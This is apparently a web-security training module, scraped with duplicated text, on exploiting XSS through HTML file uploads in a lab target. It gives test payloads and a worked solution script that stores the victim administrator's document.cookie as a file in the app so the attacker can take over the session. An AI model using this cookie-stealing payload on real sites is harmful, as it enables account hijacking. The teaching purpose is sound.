In this module, we exploit the existing XSS vulnerability in the exercise target, so you can start the task below and repeat the steps at your own pace.

In this task, we exploit the XSS vulnerability in the file upload functionality and steal the administrator's session cookies.

XSS in file transmission

File uploading as a functionality is complex and can lead to many vulnerabilities if everything is not taken into account. The ability to upload personal files into the system is often one of the most interesting things to test when testing websites. There are many approaches to file uploading and many things can lead to different vulnerabilities if everything is not taken into account. In this module, we will examine the kind of XSS vulnerabilities that can occur when the application allows dangerous file types and does not handle the file appropriately.

We will start by examining the application by transferring a simple TXT file and see how the application handles the file. We want to understand, among other things, how the file transfer is performed and whether the file can be accessed from within the application.

We transferred a file named test.txt to the application and the application created a link to the file on the page.

The application received the TXT file we provided and created a link to the file on the page. When navigating to the link, the application returns the file to the browser in the following way.

header can inform the browser that a particular resource must be downloaded as a file instead of being displayed as its own page in the browser. Since the application does not return this, the browser executes and displays the file in the manner described above, as its own page. This can lead to serious vulnerabilities depending on the file types allowed by the application. Next, we will try to transfer an HTML file to the application and see if this is allowed. We create a new file, add HTML code to it, and transfer this to the application.

The application allows HTML files and returns them as their own page in the browser.

We will double-check that our file may contain JavaScript code, and that the application is vulnerable to XSS attacks. We will add JavaScript code to the file and transfer it to this application.

Finally, we perform an attack using the same idea as in the previous modules, that is, we use the file storage function built into the application to leak the system administrator session cookie. This happens in the following steps.

We save a new file and analyze the resulting HTTP request

We repeat the request with JavaScript code, so that the saved file contains session cookies.

We format our malicious code to work in the discovered XSS vulnerability

We add a new file to the page, which contains our malware

We expect the system administrator to open our file, which forces the system administrator's browser to create a new file, including his session cookies

Try to replay the steps listed yourself! - You can take guidance from previous modules.

 - In order to solve the task, you first need to create an HTTP request that looks correct. For this, you need 

 objects, which can be created as follows.

 object also requires changes, so you add your created Blob object as follows.

Voit ratkaista tehtävän tallentamalla sovellukseen seuraavan näköisen HTML-tiedoston.

Näin ratkaiset tehtävän; muista yrittää ensin itse!

*In this module, we exploit the existing XSS vulnerability in the exercise target, so you can start the task below and repeat the steps at your own pace.*

@exercise 6d17cc07813f

File uploading as a functionality is complex and can lead to many vulnerabilities if everything is not taken into account. The ability to upload personal files into the system is often one of the most interesting things to test when testing websites. There are many approaches to file uploading and many things can lead to different vulnerabilities if everything is not taken into account. In this module, we will examine the kind of XSS vulnerabilities that can occur when the application allows dangerous file types and does not handle the file appropriately.

## Finding Vulnerabilities

We will start by examining the application by transferring a simple TXT file and see how the application handles the file. We want to understand, among other things, how the file transfer is performed and whether the file can be accessed from within the application.

*We transferred a file named test.txt to the application and the application created a link to the file on the page.*

![](sanity:image-3068721fe74166798dcb7875b548d5087d365aff-1980x338-png)

The application received the TXT file we provided and created a link to the file on the page. When navigating to the link, the application returns the file to the browser in the following way.

![](sanity:image-896b88e82d91f3f7c26e0eb5d2a8936683442431-1624x290-png)

**Content-Disposition **header can inform the browser that a particular resource must be downloaded as a file instead of being displayed as its own page in the browser. Since the application does not return this, the browser executes and displays the file in the manner described above, as its own page. This can lead to serious vulnerabilities depending on the file types allowed by the application. Next, we will try to transfer an HTML file to the application and see if this is allowed. We create a new file, add HTML code to it, and transfer this to the application.

```html
<h1>Hey everybody!</h1>
```

*The application allows HTML files and returns them as their own page in the browser.*

![](sanity:image-dba5c17d678c85537fe9f4aefcd13871afdbeb75-1824x364-png)

We will double-check that our file may contain JavaScript code, and that the application is vulnerable to XSS attacks. We will add JavaScript code to the file and transfer it to this application.

```html
<h1>Hey everybody! </h1><script>alert('xss')</script>
```

![](sanity:image-9d2b22d9b29456796adbd245d9a37dd54cfb3788-1634x432-png)

---

## Exploit Vulnerability

Finally, we perform an attack using the same idea as in the previous modules, that is, we use the file storage function built into the application to leak the system administrator session cookie. This happens in the following steps.

- We save a new file and analyze the resulting HTTP request
- We repeat the request with JavaScript code, so that the saved file contains session cookies.
- We format our malicious code to work in the discovered XSS vulnerability
- We add a new file to the page, which contains our malware
- We expect the system administrator to open our file, which forces the system administrator's browser to create a new file, including his session cookies
- We log in as an administrator

Try to replay the steps listed yourself! - You can take guidance from previous modules.

**Note!** - In order to solve the task, you first need to create an HTTP request that looks correct. For this, you need **Blob** objects, which can be created as follows.

```javascript
var blob object = new Blob([document.cookie], {type: 'text/plain'});

```

The **FormData** object also requires changes, so you add your created Blob object as follows.

```javascript
fdata.append('share-file', blob object, 'filename.txt');
```

@embed 5850049737ca


Voit ratkaista tehtävän tallentamalla sovellukseen seuraavan näköisen HTML-tiedoston.

```html
<script>

  var blob = new Blob([document.cookie], {type: 'text/plain'});
  var fdata=new FormData();
  fdata.append('share-file', blob, 'tunnisti.txt'); 
  fetch('/',{ method: 'POST', body: fdata });

</script>

```

XSS in file uploads - HTML

Learn how to find and exploit a vulnerability that is one of the most common vulnerabilities, easy to find, and yet very dangerous. Hackerone ranked XSS the #1 bug bounty vulnerability of 2021.

XSS (Cross-Site Scripting) vulnerabilities are both common and serious. For example, HackerOne has listed XSS as the number one vulnerability on their top 10 vulnerabilities list.

Vulnerability management is therefore extremely important, whether you are a penetration tester, a security consultant, a developer, or a bounty hunter!

XSS in file uploads - HTML

Finding Vulnerabilities

Learn to hack — start here